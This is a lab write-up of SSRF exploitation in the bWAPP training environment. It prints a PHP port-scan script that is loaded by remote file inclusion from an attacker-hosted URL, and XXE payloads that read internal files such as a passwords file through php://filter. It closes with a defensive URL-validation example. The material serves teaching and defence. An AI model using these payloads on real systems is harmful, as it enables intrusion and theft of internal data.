SSRF
SSRF (Server-Side Request Forgery) is a vulnerability in which an attacker constructs a request and gets the server to issue it on the attacker's behalf: the request originates from the server, not from the attacker's own machine.
What SSRF can be used for
* port scanning of the internal network
* reading local files via the file:// protocol
* fingerprinting web applications on the intranet
* attacking web applications inside the network
The port scanning and file reading cases are demonstrated in the practice below; the others will have to wait for a later write-up.
Finding the vulnerability:
any feature where the server fetches a resource from outside (or inside) the local network may have an SSRF vulnerability, for example loading or downloading images from a URL, page sharing, and so on;
whenever you see a URL-type parameter, it is worth testing for SSRF.
Two labs to reinforce SSRF (the bWAPP challenge description):
Server-Side Request Forgery (SSRF) is a technique to bypass access controls such as firewalls; basically the web server is used as a proxy. The tasks are:
1. Use RFI to port scan.
2. Use XXE to access resources on the internal network.
3. Use XXE to crash my Samsung SmartTV (CVE-2013-4890).
The lab gives us these three tasks, done in the bee-box VM environment. I do not have an environment for the third experiment, and personally I feel the first two are enough to understand SSRF.
Port scanning using RFI
Clicking the first task gives us a port scanning attack script;
let's review the PHP code with a little code-audit knowledge:
    <?php
    echo "<script>alert(\"U 4r3 0wn3d by MME!!!\");</script>"; // echo output function
    if(isset($_REQUEST["ip"])) // was an ip parameter submitted?
    {
        // list of port numbers to scan
        $ports = array(21, 22, 23, 25, 53, 80, 110, 1433, 3306); // the ports to be scanned
        $results = array();
        foreach($ports as $port) // iterate over the array
        {
            // fsockopen opens a TCP connection with a 1 second timeout: this is the port scan
            if($pf = @fsockopen($_REQUEST["ip"], $port, $err, $err_string, 1))
            {
                $results[$port] = true;
                fclose($pf);
            }
            else
            {
                $results[$port] = false;
            }
        }
        foreach($results as $port=>$val)
        {
            $prot = getservbyport($port,"tcp"); // returns the service name for the given port and protocol
            echo "Port $port ($prot): ";
            if($val)
            {
                echo "<span style=\"color:green\">OK</span><br/>";
            }
            else
            {
                echo "<span style=\"color:red\">Inaccessible</span><br/>";
            }
        }
    }
    ?>
Then we use the remote file inclusion vulnerability to load this port scanning script; in the lab it is hosted as a remote file at http://192.168.191.6/evil/ssrf-1.txt
My attacker machine here is 192.168.191.6, which is my Windows box;
visit the site and enter it:
after clicking Go, the URL becomes: http://192.168.191.6/bWAPP/rlfi.php?language=lang_en.php&action=go
This is obviously a file inclusion vulnerability; by combining it with SSRF we can make the server itself run the port scanning script and issue the requests, which achieves the attack;
there are two ways to do it: capture the GET request, add the ip parameter, and forward it;
or use the Firefox HackBar plugin; because HackBar is now paid, what I use is Max HackBar;
Figure: the modified GET request forwarded, showing a successful attack.
Figure: the same result obtained with the Firefox plugin.
Accessing resources on the internal network using XXE
Clicking the second task gives us the ssrf-2.txt file, with the following content:
#Accesses a file on the internal network (1)
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY bWAPP SYSTEM "http://localhost/bWAPP/robots.txt">
]>
<reset><login>&bWAPP;</login><secret>blah</secret></reset>
#Accesses a file on the internal network (2)
#The web page returns some characters that break the XML schema > use the PHP base64 encoder filter to return an XML schema friendly version of the page!
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY bWAPP SYSTEM "php://filter/read=convert.base64-encode/resource=http://localhost/bWAPP/passwords/heroes.xml">
]>
<reset><login>&bWAPP;</login><secret>blah</secret></reset>
Seeing this code, we should think of combining the XXE attack with SSRF to read files:
enter the XXE vulnerability page, click "Any bugs?" and capture the request;
send it to the Repeater module;
replace the XML in the request with the first payload from ssrf-2.txt and send it:
we find that four are not accessible;
but through this vulnerability we can still get the contents of /bWAPP/passwords/heroes.xml, returned base64 encoded.
Decoding:
This is how we obtain further internal network resources (using the php:// protocol and the file protocol);
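Both labs work because the server fetches whatever URL it is handed: php://filter and localhost in the XXE payload, an arbitrary ip in the RFI-loaded scan script. As an added example, not bWAPP code, here is the allow-check a PHP application should run before any such fetch; the $resolver parameter and the stub DNS table are assumptions so the demo runs offline.

```php
<?php
// Added example (not bWAPP code): validate a user-supplied URL before the
// server fetches it. $resolver is a hypothetical injection point for the demo.
function isAllowedOutboundUrl(string $url, callable $resolver = 'gethostbynamel'): bool
{
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return false;                           // malformed, or no host at all
    }
    $scheme = strtolower($parts['scheme']);
    if (!in_array($scheme, ['http', 'https'], true)) {
        return false;                           // blocks file://, php://filter/..., gopher://, dict://
    }
    if (isset($parts['user']) || isset($parts['pass'])) {
        return false;                           // http://trusted@evil tricks
    }
    $port = $parts['port'] ?? ($scheme === 'https' ? 443 : 80);
    if (!in_array($port, [80, 443], true)) {
        return false;                           // the proxy must not reach 21/22/3306/... like the scan script
    }
    $host = strtolower(trim($parts['host'], '[]'));
    // Resolve once and check EVERY address; the real fetch must then connect to
    // one of these checked addresses (IP pinning), or DNS rebinding can swap in
    // a private address between this check and the connect().
    $addrs = filter_var($host, FILTER_VALIDATE_IP) ? [$host] : ($resolver($host) ?: []);
    if ($addrs === []) {
        return false;                           // unresolvable name
    }
    foreach ($addrs as $ip) {
        $flags = FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE;
        if (filter_var($ip, FILTER_VALIDATE_IP, $flags) === false) {
            return false;                       // 127/8, 10/8, 172.16/12, 192.168/16, 169.254/16, ::1, fc00::/7
        }
    }
    return true;
}

// Constructed offline demo: a stub resolver instead of real DNS (203.0.113.10 is a TEST-NET address).
$stubDns = fn(string $h) => ['localhost' => ['127.0.0.1'], 'public.example' => ['203.0.113.10']][$h] ?? false;
foreach ([
    'http://public.example/page',                 // allowed
    'http://localhost/bWAPP/robots.txt',          // loopback -> rejected
    'php://filter/read=convert.base64-encode/resource=http://localhost/bWAPP/passwords/heroes.xml', // scheme -> rejected
    'http://192.168.191.6/evil/ssrf-1.txt',       // private range -> rejected
    'http://10.0.0.5:3306/',                      // private range and non-web port -> rejected
] as $u) {
    printf("%-48s %s\n", substr($u, 0, 48), isAllowedOutboundUrl($u, $stubDns) ? 'allowed' : 'rejected');
}
```

The check only helps if the fetch is made to the address that was validated and redirects are re-validated the same way.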
Oh, and I also picked up a little new knowledge along the way; hoping the big brothers will take me along.